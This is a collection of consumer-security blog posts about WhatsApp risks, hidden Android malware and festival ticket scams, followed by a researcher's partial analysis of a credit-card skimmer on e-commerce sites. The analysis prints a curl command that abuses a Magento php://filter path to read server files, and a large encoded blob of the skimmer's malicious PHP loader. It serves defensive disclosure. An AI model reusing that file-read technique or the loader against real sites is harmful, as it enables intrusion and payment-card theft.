Is it true that WhatsApp has been hacked?

Yes. Several times and in various ways. No app, service, or network has proven to be unhackable. Safe Family Tip: Assume that any digital platform is vulnerable. Maximize privacy settings, never share risky content, financial information, or personal data.

Is WhatsApp safe to send pictures?

Encryption ensures that a transmission is secure, but that doesn’t mean WhatsApp content is safe or that human behavior is predictable. People (even trusted friends) can share private content. People can also illegally attempt to gain access to any content you’ve shared. This makes WhatsApp (along with other digital sharing channels) unsafe for exchanging sensitive information or photos. Safe Family Tip: Nothing on the internet is private. Never send or receive pictures that may jeopardize your privacy, reputation, or digital footprint.

WhatsApp isn’t the only popular app with security loopholes hackers exploit. Every app or network connected to the internet is at risk for some type of cyberattack. We hope this post sparks family discussions that help your kids use this and other apps wisely and helps keep your family’s privacy and safety online top of mind.

The post WhatsApp Security Hacks: Are Your ‘Private’ Messages Really Ever Private? appeared first on McAfee Blogs.

Is Mobile Malware Playing Hide and Steal on Your Device?

Over the years, we’ve all grown accustomed to using our smartphones and mobile apps to support our lifestyles. We as consumers have developed expectations of how devices can enhance our everyday lives- from online banking transactions to handling work correspondence on the go. But as we become more reliant on our smart devices and apps, hackers use this dependency as an opportunity to gain unwarranted access to our personal data. According to McAfee’s latest Mobile Threat Report, hidden apps are the most active mobile threat facing consumers, generating nearly 50% of all malicious activities in 2019. Let’s dive into these mobile threats and how they could potentially impact your life.

Don’t Let These Mobile Threats Commandeer Your Device

LeifAccess

LeifAccess (also known as Shopper) is an Android-based malware distributed through social media, gaming platforms, and fraudulent advertising. Once installed, this stealthy hides its icon and displays fake security notifications, hoping to trick the user into granting the malware accessibility access. LeifAccess/Shopper has also been found to use third-party logins to cheat app ranking systems and wreak more havoc on victims’ devices. The malware uses the accessibility features in Android to quietly create third-party accounts, automatically download apps from Google Play, and post reviews using names and emails configured from the victim’s device.

According to the Mobile Threat Report, hackers are also tricking users into installing adware onto their devices, redirecting them to a variety of fraudulent ads. Because digital ad revenue is simply based on screens displayed and clicks, hackers are quick to exploit this threat so they can collect fraudulent ad revenue at the expense of unsuspecting users. Due to the volume and speed of the redirects, many consumers don’t even realize that their device is infected or that their data is being collected.

HiddenAds

HiddenAds masquerades as genuine apps like Call of Duty, Spotify, and FaceApp to trick users into downloading them. But once the app is installed on the victim’s device, the app icon changes to one that mimics the Settings icon. When the victim clicks on it, the app displays a fake error message that reads “Application is unavailable in your country. Click OK to uninstall.” However, clicking OK completes the malicious app installation process and then hides the fake Settings icon, making it nearly impossible to find and delete the malware.

MalBus

McAfee researchers also discovered a new targeted attack hidden in a legitimate South Korean transit app. Called MalBus, this new attack method exploits the app developer’s hacked Google Play account. Once the hackers accessed the developer’s account, they added an additional library to the apps and uploaded them to Google Play. Now, MalBus spyware can phish for   with a local webpage that mimics the real Google login screen. Additionally, MalBus can drop a malicious trojan on the victim’s device, searching for specific military or political keywords. If these keywords are found, the victim’s matching files are uploaded to a remote server without their knowledge.

How to Stay Protected

As hackers continue to target consumers through the channels they spend the most time on – their mobile devices – it’s important for users to reflect on the current digital landscape to help protect their data, as well as their family and friends. Follow these security tips to defend against stealthy mobile threats:

  • Do your research. While some malicious apps do make it through the app store screening process, the majority of attack downloads appear to be coming from social media, fake ads, and other unofficial app sources. Before downloading an app to your device, do some quick research about the source and developer.
  • Read app reviews with a critical eye. Reviews and rankings are still a good method of determining whether an app is legitimate. However, watch out for reviews that reuse simple or repetitive phrases, as this could be a sign of a fraudulent review.
  • Update, update, update. Developers are actively working to identify and address security issues. Frequently update your operating systems and apps so that they have the latest fixes and security protections.
  • Use a VPN. A virtual private network, or , allows you to send and receive data across a public network, but it encrypts your information so others can’t read it. This can prevent hackers from spying on your internet activity, therefore protecting your privacy.
  • Keep tabs on your accounts. Use ID monitoring tools to be aware of changes or actions that you did not make. These may have been caused by malware and could indicate that your phone or account has been compromised.
  • Defend your devices with security software. Comprehensive security software across all devices continues to be a strong defensive measure to protect your data and privacy from online threats.

To stay updated on all things McAfee and the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Is Mobile Malware Playing Hide and Steal on Your Device? appeared first on McAfee Blogs.

Burning Man Is Coming: How to Watch out for Ticket Scammers

As the winter months fade and spring begins to creep up, many millennials and Gen Zers set their sights on festival season. Whether they plan on attending Coachella, Stagecoach, Outside Lands, Lollapalooza, or Governor’s Ball, festivalgoers across the world anxiously begin to look for cheap or discounted tickets in the hope of enjoying these events as affordably as possible. This eagerness, however, provides scammers with an opportunity to scam attendees out of hundreds of dollars, as well as the experiences themselves. In fact, according to Threatpost, ticket scammers have recently set their sights on wishful Burning Man attendees.

How This Burning Man Scam Works

The dystopian, futuristic festival that is Burning Man takes place in late August through early September, attracting tens of thousands of people from around the world and all walks of life. While truly an immersive experience, the festival can be quite expensive. So, it’s no wonder that burners – the nickname given to festival attendees – would be eager to find the cheapest price for their tickets. With this scam in particular, fake Burning Man concert organizers are offering passes in what researchers say is a very convincing and sophisticated effort. These tricksters have set up a fake website that closely mimics the official Burning Man site to fool visitors into thinking it’s the real deal.

How to Stay Secure

Seasoned festivalgoers know that ticket scammers are out there. But as the traps become more sophisticated, it’s vital that they know how to spot “too good to be true” deals. To avoid being burned by tricksters, follow these tips:

  • Only buy tickets from reputable vendors. While purchasing a cheap ticket from a third-party vendor is tempting, buying a ticket from the actual festival site rather than one that offers a good deal is the way to go. If not, you risk not only losing money but also the festival experience.
  • Carefully inspect any site before entering payment details. Burning Man’s official website features event history, an invitation to collaborate, press releases, archives from past festivals, and more – so make sure to scan for a variety of pages to confirm that the site is the real deal. Adding to that, be sure to also inspect URLs for suspicious characters.
  • Use payment that’s protected. If for some reason you do fall victim to a scam, most credit card companies help you get your money back in event of fraud. Additionally, PayPal offers buyer protection when paying for “Goods or Services” that allows you to chargeback, just as long as you don’t pay as “friends and family,” which means no buyer protection.
  • Monitor your online accounts. You’re never too young to start monitoring your credit! Be sure to regularly inspect your account for suspicious activity. If you do suspect your data or account has been compromised, place a fraud alert on your credit.

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post Burning Man Is Coming: How to Watch out for Ticket Scammers appeared first on McAfee Blogs.

Uncovering New Magecart Implant Attacking eCommerce

If you are a credit card holder, this post could be of your interest. Defending our financial assets is always one of the top priorities in the cybersecurity community but, on the other side of the coin, it is one of the most romantic attacks performed by cyber-criminals in order to steal money. Today I’d like to share the analysis of a skimmer implant spotted in the wild. So far I am not sure hundred percent that the discovered implant would be an evolution of Magecart – since the activation scripts are quite different even if they do use Magento core infrastructure. We might be facing a new Magecart version or a new framework as well for my current understanding, notes suggestions are always welcomed.

Disclaimer

National law enforcement units have been alerted, few hours are gone after they gave me the authorization to publish this POST. Please if you used your credit card in one of the following eCommerce (IoC section) consider your credit card as a no more private card: call your bank and follows the deactivation steps. Since C2 and Relays are still up and running, in order to avoid replication, the addresses have been obfuscated. I want to thank Daniele B. for giving me the first “wired eCommerce”

Analysis

Everything starts from a vulnerable eCommerce web-site. The user don’t feel anything weird since she would normally get items into her web-chart, surfing from page to page watching and selecting items and finally deciding to check them out by register a new account or just as proceed as guest user. However the attacker could abuse the eCommerce vulnerabilities introducing a nasty javascript sending out information (for example: Name, Address, eMail, credit card number, cvv, expiration date, and so on) to another host, belonging to the cyber criminal. The following picture shows the point.

Fig1: External Connection outside the eCommerce Perimeter

From Fig1 we see an alien connection (HTTP POST) to an external source: https://*****.]com/js/ar/ar2497.%5Dphp . This POST carries out a quite interesting payload as partially (avoid info_leak) shown in the next code section.

touch=86f63747d33786f607e237f62656c6164786f6d656e236f6d662e657d6265627d3431343431333831333737383930303136256870713d3236256870723d32303235362366767d3736353626696273747e616d656d3a4f686e6164716e662c6163747e616d656d3259667965627166216464627563737d35452230366f657e6471696e652230377169752233452230313236236964797d364275637e6f6623747164756d3132362a79607d393336353036236f657e6472797d35535620786f6e656d3535393d2233373d283836256d61696c6d3a686f6e6164716e6524303279636b696e236f6d66257167656e647 .....

The encrypted/encoded data lands to an external gate hosted on *****.]com. This is a slightly difference behavior if compared to the original Magecart which used to send data directly in base64 format. Mykada looks like a legit eCommerce website that could be compromised and used as a relay (one more difference from Magecart). A further investigation on such a rely shows a magento core installation (this is a common indicator to Magecart) which includes the js/index.php (ref: https://github.com/integer-net/GermanStoreConfig/blob/master/src/js/index.php) providing a nice tool to dynamically building-up a composite javascript file for performance boosting and compression rates. By using such a public magento-core functionality and by guessing file paths (looking for known public folders on the host would help you in guessing paths) we might obtain the original malicious back-end file injected from the attacker.

curl http:]//*****.]com/js/index.php\?f\=php://filter/convert.base64-encode/resource\=/home/****/public_html/js/ar/ar906.php

The result follows:

PD9waHAgCmlmKGlzc2V0KCRfR0VUWyd0b3VjaCddKSkKJF9QT1NUWyd0b3VjaCddPSRfR0VUWyd0b3VjaCddOwoKZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgnZU5xTld2dFRFMWY3LzFlMmpETWxnSEYzazAxQTNyd2RMd2hhQk9VaVF1TXdtODBKaVd5eStlNXVnTkRwYUR1b1dLd2RwZDZtdjloUjI2b0Z4UmxrbkU1bkxGcXNVclZlS2xwdC9WZStuK2VjVFVnQ3lvc1Njam5uUFBmUGN6a3hUTjF4cFA1VFp6OS9mdUxUckowYTBsMG1PYTd1cG94MS9STXZqMDgrdU5TNG9XYXphVm54VENxelg5OG9iWmZNbERFbzVhMmNMVEhkTnEwWXE1UDBURnpLWmVLV2VIdFlkNDJrdjJhRE9FZEs1REtHbTdJeVV2L0MxQisvVFYxOGRLdDZYZjhQeDY1ZGZUdjkvZEtNNzlOVW92b0RoNW1KalJzTEpIMGJ4ZXYrcDdNblp2NzQ2OERNaFdvZjJPalViVDJwTkNRTXNKSEdUNTFrRGVwNUVHS1plQ3JSYURNM1oyZWsyS2JPcGxDd1A4NjJ0TWVicXNzUC9xU0U4RDVmNDJlVm9ybjZJSU1NVWxiUHVJNWtKUkoxMG9DZHk3aXB6QURFeG1lNjVOcVdhWUptdWJKS2hDemgrZE55NmhIZHR2VjhkVlgvN0tFTEU1OS9YeFg1YjFXOHVVSHBqY29oZFNBcWg3V3F1cXIrZjJiK2pvN0VZaGZ4YWJuRXZVeFBjdTJEalpRcjJWWnVnSlJjdFZ0dHlNV2JvNG9haW82RXRmaVc2RWhBaVk1b1duUWtwTzNkakVjanFpaGgvRzNZTE9OOWZXOVNibFdUZUJwU2U0YkQyNXZick42OTBaR2dqdDE2SHhiVTcyNklLc0VnM3RQVXFFTG5CQTA4RHc1RWlMMW9RRlhHeDhlWGlQbmRJQnB1MjkrM3QyMFVKSUo0cGJWRmxWQW9sdW5JeDFTY0YzWjM5NHc0UkFsTUJYQXFma1BCcmg1aVZzWkxwUm1rdElDQjdWb1lyOFBkSUtaQkV3cFcwSG1oTGNNREhmS2U3bGE4SDlpOHF6dXF5S0dPSFYyeTFrVzgzRDBmVllQYTdmbW9xb1Rtb2lQMURkZVh1UUpSSFl4RmxiRGEydDAyRk11UU9Qa1lxVm93aHRmaEVTY1dNRnc4VXdLa0FiT3ZlUStwRWlwTGdodTFaV2RvZTB0SFBrNEhrbkJjQVdjdmpEMDY5Q0Fha0lPTHAzN2s5SHFFQ2pnWkNCTEMwakpLcEFLY0JrcGRnUjFRQUxlQ2F1YmFVeEJIK1Q4NjlNdWIwQ3RzWktoUk5ZRFA2K056YjdnRGxMdW5rOVpGNkVsdWtvSXdabGt1K1g4VnpvZ3FBUnhRSDN6OTlaWFR6MytJcXBwR3pJR2VxcEJyd1FCeGI5WEM3VWRUSUtYVDcvUzNLL3lzUFNubDRXcDFvS0c3VW9JeDA1RUd3QVhSMlRFUTRVbzRkaElFQWc4dlIwY2FJR1M5UXFSMjdSYWZIWi82OCs2SlAzLzhkd1gvbmNSOVhlRlBuakdtNjhsazB1Ty8vL2wzYzlGQUlEZzUvcHBPNitwcENPblFYRzludmRKS3h0dzA4UEUyOHN0c0xFMm1IS0xuMERFWkxqN1FaZTRlYU92RVN6aE5XRzdQNDAwVkQ2SGdmdTVaOE95ZEtYd1VDbi9jU1IrMVFBMHFkeE03bHEvUHczazFtQ0xZUlB2aStBMDJrZVhvUlNjQ0tFakJReUZWdjhQc1N6Y0VXMGZGc25CREswNVhONVdvOXNGWEwwN0JOV0RCaG9iVkRKZ21mSEdzTkpOY1MzZGNqcHNNV2tZOEEyd0VlZ0tRL1ZJcmZkTCtJZjRPTWtlSzVWeVg0UlBUbEZJWnNjcXdvVVcvdEJNd1NBb2tiU0NZNUpDSEp0d1NSdzlNL1hvR1lLS0NKZkFmRDZ5d05ia1NCeFN5OVVjNFIyOXVHSTF6aVFwNE5IYnZLWTVRdnZ1T3JCTEw3SEVocDBJbUNPVzUxZTdmT3ZQN1NSd2UvM1Z1RllHemNCOGhjRXpQNEo5RHpQYnRUUTZUQ25jVEhjN3B6T3M1QkxGTVVVVmthTUZPd2dQaFVSZFBqOFBkZ3RFUlBYUUJsQkxrSnRkb1hTL0JTcC9xS2Y5bmVHTDk5M08zVi9Ib09tbVluRm0zR1JkNXdNcGtkQW5wYWpqbEppRzc1VEFTdmkvTjBSS0dOUVJlcVhDU2tFWUM5eWdtUno4VlVScFFBOGNYNXFlUG5iOURQRkJvTjI4YmpUY1Q0TmJIQ051MGd1NStQVXlvQkw2MVMyL3ZVSVN2ME5BQWN5VW9KOHYwVE02RjNYZUpKMUxDdHRKZ2pOUm1tbG5kSGlTOTlmWjBEQnJwUGFQR2NLUkFnWUlQTGgrZW5Mb3cvK2dHQnhDRTVBb05lTWVTa0wycUNlRmt0cHVPOENCZFVTN2NnMmlCY3dzblBaRUNnUTc0dGh3WDNxOFY0S1AvMm0vMy83MDQrVEtxaHJUenRKU2xzU3c0VEI5OWpqZVZHMWNQaXhPUWcrQ0hEWlNNS0Iwd0FRNGNwQUtCd093LzkwZzFNVnByRU9EV0QxR1dTSGR6aHM2L2hNcVV4Vm51Q2oxS1V1OFo1dS9mbkh0ODdjYzMvTzNPYlIzZDNkc2E5blRMZXpyM3l0dGF5RmJkV3JkUVNRTmNKUlo2eVQwS1hnLzVBbU40VUZkby8yT1drWnJ0VkNMQjh0SU8yMDhwbG40OFVPb0NTMnlQQ3ljTFVRb1EvdjRqV0lzZC9BY3dIWGgxWVlXZWUwcTl6TlhOUVNvYzlKaVY0OEhWMFV5cHplM3RNU2xUOCtpNWV3Q015Y1RjeWNjOHduWXJoRTA5OU9IRUlsUVVqcXJod0pXdnI2eU1yUS9Ua3BObEdiY09ZYlkvbDg3Q240Y3p3QWZYNG80RHY0RlVCQ05PMnVLVlMwSjNrUzJveWtuYTFqQUtDR1BRa2NBdnJUWjAxeEU0b3NLYnlVSDZDcG1EMjIxRVN4eUQ1UEVYQjhtTi83MUVyTFlTU0lvSS9lZmdyVCtlUXQrQlpldnp5aUZrOE96ZkxLcVFrTlpIK1JqYjVMVE9hNDVpMkpTbVdDTDI0TzRGRGx5cUdweUh3OGhldElmaXBMb0Fsc3NFeWthdWo3Q2REblI2a2V6QmRvd1RScG5nOW5uNTZNSENPWlFKSVhnbnBhb2crZm1yR2U1RHpRME9wZUxtUFhuUE5hY0p0N0ZJdS80UVVCU2lSZHNwUjBjSzdrK3U5QWlNZ1drOS9PaklDdnQzSlZPT2hQK09tOHVtZU1ic1RadE9qS0xJRkx4bWllMVl6N1pzYkpOZzd3MmgxaXNxcS9DclBiejhKeGVWZGpYVEZ1Z3JPeHB2MldHS2xJWGlBR1laOGJRRWRrTVVSaFNPZDYvZkVrcnlGQTkxQitnSTJqZWFIWTRGMm1TQ1M3VmhrTjd4ZFBQdG8vSEYrL0JscFdDMk5OY3ZZWnJIOHlncE4wL09FSTVucWFnTFFMdEJwT2JkQlZOTi9nRTJBbytCMEtFaUF5YXZlRWlBMGV4K2ZXK0h3Q28xRktKTUVmdCtDYTdDWVd0bGplQmFHU1p0c2N3NG5ySWhKbTNLT2FpK3BZSFVFUEpnMmt1ZU1jYnNvbktiemFKblpmZkhBcFNaY3ZFV1VkR0NXYVJ0MVJ3ayt2UGZnTHBlVDBubStZM2JLOVVzRjZxQ0VjSTB3QklBY0FqVkJnRzZaLy9udjV5QXZoUFRFeThnYzNoMmdxc054UUVTZ0w1VjVpbzlkK1g0RlhoSWVPWWhSUFgwcXFnRUpjUlowcXVTU0hFelkvZklLUmRmSCtHVldwcmtDQmVxcUJkUDV1OHRQS0lQdWdkcFl4dVY0SlRmTzdhUlNBQzJZS2lKbmdjYlJOVjErZFE5RUF6KzloZnQwVnM2Wk9Td1lQM09VR3UrZ1NCTUM4ZE5nME95WXFUYlNFQlJzdU5rcFZXTko2bnMxVFJDNFFEWDNSQnJHZVFISDVwRi9JVy9nTmo2d3ExSjNyT2t0MUhKcERSblIvZUtLamNZeXU5YVR1YVVKTzljaERlSDVwWUkzZTUvNlFWVHVhbDdkRXJDUFRaelhKT1ZHSjZRc3AxRGkwaHlhTk0rUTR1WWNoem1scC9RNjFXUWhOWm9LWGUxZDNaOUlscFp0STdGWHBQcmVqYXF5aHB2dW56N2ZMNk5MVTJidGpiWjFhc3NwdjdyNTR0VlBsOWprdWxibXpwV1hmT0VkMEMwQnVldzFkZmNoYS9KbFBwdlUxWStQbmNVVGlHTFBYcDg5WE1KZ3M0Q3F3TFVZZHlsOXNKWDJmWnVTQTFrTEp2VmJGanVOOStjT0hqMGM0Zy91M1QyOXU5ZitqNWQxLy96ekpNakUzOHZYbDY0R25rSEZjU2Zlbk5wL3V4WGFETjhqUW5MeHY2bHQxL2R1M3htNmQ3dnM1RnFPUnlxWFM4cklSVVBzcUpXWkI3VUo0WmxvYTdqTmpNb1dCM2trR0VkNlVTS3BkRDhJKy9raDNscnZsNmlJOEloWDhVWW9ZZngyZ2NDSkhVYm1jcmhxY3BPeGRseUNuTnlHZGdjaDVReTl4K255MjVsbVdXQmNYQ0Vmc3FYMVViV3kxb2w1OExsakh5TTJmQXlTS2lGNVEwMVcxTzJtLzhZdlR3S2dqcXF0WkZKTXg4aUx6TFUyeEFrWnNYelV1TjZueEFHNXFtRlJFSEZoNzcrcDIvL1B2ckY5OGNpbmQyYndWYVJwN3BTVHVxZ2dFQ29qRXhQMGlwVUNSOTVLZ3FFZlkzcitoZCtQM0hwOVdURXliMzd1TnBxNk1kbnQrZmF0bGJML2tEWlQyM2xHNVVsQXdCMXdIS2xtR2xCMlVrOVpVTmVNOGNrbG1jTzFSSERsajBvb1ZxQkhVM0xoWW9xRC9TUk5Gb0lHZ2lxbkcrTjJGNTJPUCs3UEc1TTlLVlRWVDUvUVV4L1VYK05MQk9IRXhZbU9OMGRyZkVtdzRxejZ0S2pnUVBMVHYvZzV1M3BveGZLdlA3eHRTT3pCeVlqYkdSWHE3VzFhZFdZUkNTR2JqK2lPb1o2M3dlVXNxaVFxL0xWTFh0VFdmaUlnVTJsNzI2QzhyWkRmVU5VVmFFNGg2dWtrSlgyV3pFcHpreGtLcHZLUGdnazdkS3p1clREU21ZK2RLaHpTK2VsWm1ZUjF0blV0YTJNdS9WeVVBM1cwZ1BSTFBHWVh0U1RqcFdqYW82TjVQMVV4Y1VRUGxSbUR1c1oza1BnZk5Fd0dEQ2gxMHNhdXUydmpKOXlXWGJxaUFhUlZTMXN0N2tvZmtFdmFlVVEyZ2ExbmJsc21Td1VxN3lYMVRPU1pjZVpYYlBCU2ZXeDltM1ZCVHVRSWt1Y3RyWk1taFk5cVg4Z3RYOWNzNEdDYU82blArNWRHWHNjWVh0M21lMWIyYXFXTzNieWFzbTBnZXdseUh4U1NtV2ZyeEdKb2pQVjE4UVo4YzcxL2FjUU1aazRJaVpVK2hPdXJYeWpuRThnZ1BVQjRpYnVUZjh5RWh0eGJYMTkwOTZ1amsyU3Fkc0Q2TjFTbzZNNktuQzA4M0U3bGMyUzdYbGY2ZWc1Zy9sNUVKWFRRQUl5TEJvcTVsaWpHRjJXT3QwblJjNC84Ump2SnNacjVVb0FOYzA2S1pHeUhWN0I1eEc3WkMxSHo5ZEpWWnh4bXVDSWNyVEVkSFZTRXJWL1dzK1RCek16UzM1U1JTdFpSaHpEVVUrTW1CZzFHRVpLTngweDRlV0x1TXR4VW1reExJV2JjUmZ3UzUwV255TncvNUQycm04bDlmaEZUK1JhWERHT0pHYkUzR2tKZ3N2aGQ3dHdadFI5ZGg2OFp3WUFUM29zL3dIOFpOKytTTGZkR21kR080ZUZNZzExSURBSURGV3R0dmhRZ1h5TzBJVmVDTkE4SjQ1MUtBZkswYWZVRktXSWMvalMxTk94ejUrZmVnbnExNzVaUFBQaytzU1hKMytDSTA1K2Yrem8yMnZQM2k3OFFpaDA2OGJGaFgvbkQzcklVY1RxZUhXd0lWelArU3FSdHp1ZDl2djl2Y3dCTTk3bmxYL0wxbmR5NVgySXpCRWppQ0ZQSXlzSkQwVFNCTDRnWmgwbVphemhqNlF0T2oybFBqRko0YTBEOUJuSWNWTlNFNWpLRE9KVFdKdFB2WFdLOTJHWWtRRERWMW1zTmRNQUVKa2ZubDNjUUcwdEhERGhNcmhGR3Q3c29rUUhGNmdOQmtzY2hwTkFaQXpSMEV2NEMyY1NaRnc3eHpiVTFOUmtpVlA4M1ZEbjJiTWJDbE9DdGZ3LzUyVlpDU1NQYnFZdGgyaG5VaWc4NGlMY0lIeFJBcWtsWjl0NW9CWmNKd0gvWmQ3QjdkM0lta3FndHZCL2haeUVlNFpPMlQvSlQ2REJwOUN2eDI1ZFNmcFZOVlh6YXl2YmNvc2pQZW9mc2dPTmwzSURTVmhZTEMvL3d4a29VY0NxV1V0VlFvV1pxcTlBbnpTa3lYSkRMVDNnbE5VMlB2OXU3ZzJOVXlscGE1cjZEbGRDZElMYmhBMUVRblFpYVlGcEt0eFFrOGhBSFZVSkJzdEZiSUZROFZTY3gvRWdlVnJOaHNoL2wzWFR3WUZXYVZpaEdWcE1RK3VjeUZ1ZW1wbHVVL1l5dUxONkxIbXB6RE1uOGJwZE1tbFNscWNMRlh3czNHdFlOd2Z4d2tIUlNBa3htM05Md29GUFE2ekN0TlJLSkJqOFQ0K1pISkZYY3JmSkc5cllURWUxQjBlbDZqU2pPMjVlWU5CSDNMS29jSk9vbjNpaEs4aFlReXhUUExCRXY1WmxKY1VnblZoelhKYmxkUlVTODdKa0loSzVQNXZTTUJQallDcW5BWnE2blNhMUlPOFNkWThDN0N5SHdqSVZybkpGT2xpMkovcGxNU2NXMVFBTmU2dzBiQVFuVUZWTmxMQnFlVXp4dTZVNnpzcXdyWXNVUm9BeXpGQUEyN3pzRUtxblJxc0UwdVJhL3Q5WEo2T1hWQ3JORFFQRGwxQklaZ1lnSy9xOGxGTmlJRktMbFdVZW05YUlkNGM0bXNxU080b0x1RUpjaThva2lSVithWlBEeDhvWmhqenNNcjRiUVlyRVpTUVpRNkRUbE4zU2FSQW1NY054ZFNQdmw3cXdLSjF6dUNaRThiTGQxYzBVVmlGSE96cVNPRlhqL0VaTk5BRGNScFMrS1h0U3lqQlNnQ3dUQ0dOWlBESHhBc3lrVEpxSGdIcWN5RGtNV1QzdWNCYjVZSjFSaFZocUJXS09qYVJjUG9FRE1mN2hjdVQ1T2ZaU3Z4VFFLdm9GYjB5WHlCbURQTnlLSlExUWlNQmsrUmZHQ0dqVXZhRzRqZnlYZzkrS1NqTExiT1JBbHhHME1RZ0pyM1JxYXR3Qy9vSTNvRnRRcm5EcGJUVTFnNVNvWkErMnZLN0xJL0h1UG90SzJaMVdPcDNmQ1VVNkRqbHJ6b2FoU0VlODF4dGlDRFlLVFJwUW80SXJ5NmtiaXpuMWt5SzhBTU1WZjFpckxYbXNZSUFVeGt1MkFSMjFTWVk3ZElZTFNZbWY3L0R0aTVSVkQxb2xseUlvcURUbUpsKytLQkUxSGU5OENxekpha0NUd3hSaFliVWlNdHR5dEYyaTJvSlBzQ2c3V0NRL0hCWnd5T3NTUUFNWkh2RVpDcTVNU0RFVUtBUTBOdUVTMnVVaDVyZ0MxMnc5VGhuUTRSd0Z0V0FndUM5U3FyMWllVGx4OU1xUmJ5SUdTcWorVkZ1cXE2eUc4VFVhNkxqNm5TWVVhVzYvYm5lZ2NQRjIxQlVsSkdHbjd2N3k3OWpYRVNPSDFXeWthVXRobGE5WU9va1ZzSGMxejJob21UK3IxR3JLRVJlTEtiTEV1djdwRjk4ZS92VmhwTkRRRmFjWjd4cm0wQWlXbW9ENGkxTzN6MFZINGdZZjZGRGQvMEhoTU45R2lyR2k2SmZIYjAwdG5mbzZVdmg0MVZPUDBqU1Nia1dWTXpkK2ZZWXpzZkh3d1ZzSHh4N2ZPWEgwMi9mdkhidjNkT2E3cUJwVXhMYmY3aThjbjMvL2p1ZDA1WExyRE1qVmk2c3pHaGlLM1NmL1B2dm03d2N2SngrODl3UngyUnRUWHRQRzhidGk2NVdsbTRmdkg1cSs5SDdhRjArUC84VG40U042Z0NaN2I2N1I3cFZPTjZ6VGxTUDNNdGRLNnk1OUtVSjhyV05kL3c4L3Z6ait3OHloOTdQSTU5T3gyRGdSbTd1OWtraDV4cVZ1bVpjaHpFbEtXZHVLQTN5NWc4d2RPbjEyN3RuN1pUcnpqR3FraFhuSXhQQXNDSkx5SFVHeDNQbTI4eUVWTDMwcG9vRjdGTlIxMUZUbmRPUTZBMGxuZTl1ZTl0WTkyOXVhUzNDSlNzb3R1bWgrZU51VDRpT1NsRXVqUzRwbTNwWUxJUVRibC82NGR2bUhIOGF1Ly9SK3pzVU40YVZMYis4c0NTTSttNXUrOFdqcTZ0djNiL3M4T2hKT1RFNWRpQVprQklQQjZLNWsvcVNRdUJoNjYvcS9tUDdwMm92bjd6L3FQZzBjY1U1NDh0d0N2enZrYkJ5OU9IWDc3STFiYXpvaDNRZEM2OEZKdUhFOVhZeWNGL3N2SG52NTZ2VC80Qi8xeWd4ZEdmSTlYeDQ5Zm01eC9QM2N2cVpwdEhZdnFzcWhDYkhyd2FYeE4rZmZ2K244eSs4V1o4WHE2OCttRDVCdU81czY5alIxckxxYWJobWpxaWEvOGJhOGVEbjU1SmU1eDQrTHc2RGx0MWJkLzgzTmwrTjA3Ymc0OWdBSFJFcHhaSzJ0ZEQxeDllQS8zNzY2SUhaNjBMWFd0dWQzRC96KzRPUmp1alFWK3dwSXNNWkdNdURFNHBHZjZYcVI3K1BRNVY5MS9qTDE0dURTdjVmNDlLNElVV3NkRHd2L2MvQVdzQzc0ZE9Ld29PQWh4Ly9BbUhjRCtNMzhTN0ZUNE1DS0w2TzVWczVJOHJnczFQcG9GRnlBUjUwWHJBNnY3Nmc1UkZtckE4QVF5cDFJRUdhZVE5bWFiSWpid3h0ams2OW15a1R3djBQaTZYT0hyajljNElyeVdGN0Rlb3VQWnVrMmtjTDRpS0RBWFhxdGJXL0dYejJoRzBPb1Y3djhwOWhZQkowVmF1S0RkYTRlK2k0SjNmeldGZW9aR2gweDZnUFRLTmVBajNUUkJtQWNzSFcwVm12cXFQLzB4Q3hkUFhMNkhtcXM3ZVlOTVlGYTlmV0xsQXJQaWUwQ3JsYUFkak54Z2dLWk9kUXdJbDJZS01UNW9KaFhVMzQrRFMzRGRZN0lOTzhROHhFemxSRXlHUWhoeXhVZHdHak9NSkkwUUZoYlJISERDVWJEMDRMUkFraFhxQmxPVmp5VjAyS093NXppSkpaSXIwM3M1c25YNUhCTFJ3OElXaHhKS3dodDFkTVozaGQ2VldCcUlPbDYwejRxY2FuR2FtbnZXcHZXL0RjbmY3eExkNkdja3NCZk10Nk5INStjdm5veXNsbDM2SnVVckcyTHRaVlY3M2VzdHY2bU5vT2VMNS9yODVWc1FHSEkyb3gyc1VDOFJ4OHYxNk9SMWFzaE5heWQrSHA2QXFnWm9zdkQyUWtlUHQ0Sjd3bzB4S1dtSHI4eVIxODdlZmdFTzBDOXFZMS82ZFBEZWQrcVVEWXpSdGxPM0x3aWo0UTVyZmZrQStKS1hNWWlIWlNNQVZkZlc4OHVuN3FIK2s3Vy91Smo2cEpPWm9WajgzYVBHVWxMV24zc0kydmk3dlhMQldoSW1RU2pPOTErZXhOZC9LRHRXUytIZytqMVFrRTVyRlJjOU93VThaSEtPdkI5eDBXVFRaVUpiMnF0aENzWmRyNTRRMkNpci9EVEJqRkhjVVJnMFJTUG1RenJkR3EzY3huMHNrNVNUTFhzdFBoV2lac3lCdk0wdHpGVENaT1BNNmljb3VPb2xTRytna0c1VXVUbFRoYk5wT2dGOEpEVzQyWXE1b2daQzNvaFY1ZlE4QmNQVXBSUXhVVmVMM1Ztd3pTcDNvNDRGeFdreHlTaldVVXBXM1Y4dk1MYkp6R3NwZ0d3TjlIT1pZdGZxS01yTUwvVWhwWitlVGpsTU9obWMwME5MM3Ryb1hSWmxlV3c3MTBlU1FWOTRPS0x1YVhmNy9QcjhpcGZZMGtuMHZqL2ZlODJwdz09JykpKTs=

We are now facing an initial stage of obfuscated .php code. The following image (Fig2) shows how the attacker obfuscated the first stage. You might appreciate the activation variable “touch” which would activate the process in both flavors: GET and POST. Once the activation variable is found a compressed and encoded payload is fitted into a multiple variable concatenation chain and later executed (eval).

Fig2: Payload Stage 1

By following the reverse obfuscation order chain we will end-up in having the following code (Fig3). This time the attacker used more obfuscation techniques: from charset differentiation, junk code to spear random comments making quite hard the overall reading. But taking my time, ordering every single line, substituting variables and encoding with my favorite charset I was able to extract the decoding loop and to quickly understand the Payload behavior

Fig3: Payload Stage 3

Indeed, once the script decodes the received payload (by rotating on charsets with hard-coded strings) from the compromised eCommerce (Fig3 decodes touch variable content), every stolen field is ordered into a crafted object and is sent to one more external host: https:]//^^^^^.]su/gate/proxy. The following code section would help us to understand the execution chain.

